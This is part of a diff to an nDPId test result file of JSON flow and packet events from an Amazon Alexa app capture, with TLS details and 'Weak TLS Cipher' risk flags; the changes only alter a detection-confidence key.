00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":477,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1490976044588,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976044588,"pkt":"AMDKkaPvePiC0\/vCCABFAAAodBFAAEAG0vGsECrYNF7ohrJuAbv0jjuju8rxnFAQAVco7QAA"} 
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":478,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1490976044589,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976044589,"pkt":"AMDKkaPvePiC0\/vCCABFAAAopBNAAEAGou+sECrYNF7ohrJvAbuLWOunprYg71AQAVfH3wAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":479,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044502,"flow_last_seen":1490976044595,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044595,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45677,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044509,"flow_last_seen":1490976044595,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044595,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45678,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044521,"flow_last_seen":1490976044596,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044596,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45679,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":479,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044502,"flow_last_seen":1490976044595,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044595,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45677,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044509,"flow_last_seen":1490976044595,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044595,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45678,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044521,"flow_last_seen":1490976044596,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044596,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45679,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1490976044679,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044679,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8WzRAAEAGfuWsECrYCsl+8Z0KH5BhrRWqAAAAAKAC\/\/9isAAAAgQFtAQCCAoA9k\/EAAAAAAEDAwg="} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":486,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976044502,"flow_last_seen":1490976044687,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976044687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45677,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 
-01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":489,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976044488,"flow_last_seen":1490976044687,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976044687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45676,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":491,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976044521,"flow_last_seen":1490976044687,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976044687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45679,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":495,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976044509,"flow_last_seen":1490976044687,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976044687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45678,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -00912{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":511,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976043814,"flow_last_seen":1490976044708,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2075,"flow_avg_l4_payload_len":230,"midstream":0,"thread_ts_msec":1490976044708,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":513,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1490976043814,"flow_last_seen":1490976044708,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4995,"flow_avg_l4_payload_len":454,"midstream":0,"thread_ts_msec":1490976044708,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","server_names":"fls-na.amazon.ca,fls-na.amazon.com,fls-na.amazon.com.br,fls-na.amazon.com.mx","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=fls-na.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2F:16:23:0F:F8:49:12:18:49:55:48:DA:E6:59:D9:B3:BB:0E:41:8A"}} 
+01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":486,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976044502,"flow_last_seen":1490976044687,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976044687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45677,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":489,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976044488,"flow_last_seen":1490976044687,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976044687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45676,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":491,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976044521,"flow_last_seen":1490976044687,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976044687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45679,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":495,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976044509,"flow_last_seen":1490976044687,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976044687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45678,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": 
{"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00912{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":511,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976043814,"flow_last_seen":1490976044708,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2075,"flow_avg_l4_payload_len":230,"midstream":0,"thread_ts_msec":1490976044708,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":513,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1490976043814,"flow_last_seen":1490976044708,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4995,"flow_avg_l4_payload_len":454,"midstream":0,"thread_ts_msec":1490976044708,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","server_names":"fls-na.amazon.ca,fls-na.amazon.com,fls-na.amazon.com.br,fls-na.amazon.com.mx","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=fls-na.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2F:16:23:0F:F8:49:12:18:49:55:48:DA:E6:59:D9:B3:BB:0E:41:8A"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":599,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976046418,"flow_last_seen":1490976046418,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976046418,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45680,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":599,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1490976046418,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976046418,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8dehAAEAG0QasECrYNF7ohrJwAbub2CWZAAAAAKAC\/\/+NLQAAAgQFtAQCCAoA9lBxAAAAAAEDAwg="} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":600,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1490976046475,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976046475,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwWCFAAOcGR9k0XuiGrBAq2AG7snCFN7lwm9glmnASH\/679wAAAgQFtAEDAwY="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":601,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1490976046478,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976046478,"pkt":"AMDKkaPvePiC0\/vCCABFAAAodelAAEAG0RmsECrYNF7ohrJwAbub2CWahTe5cVAQAVcGaQAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":602,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976046418,"flow_last_seen":1490976046478,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976046478,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45680,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
-01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":605,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976046418,"flow_last_seen":1490976046847,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1490976046847,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45680,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":602,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976046418,"flow_last_seen":1490976046478,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976046478,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45680,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":605,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976046418,"flow_last_seen":1490976046847,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1490976046847,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45680,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":615,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976047014,"flow_last_seen":1490976047014,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976047014,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34033,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":615,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1490976047014,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976047014,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8JC1AAEAG7\/2sECrYNu8YuoTxAbsotHSAAAAAAKAC\/\/+r6QAAAgQFtAQCCAoA9lCtAAAAAAEDAwg="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":618,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976047050,"flow_last_seen":1490976047050,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976047050,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34034,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 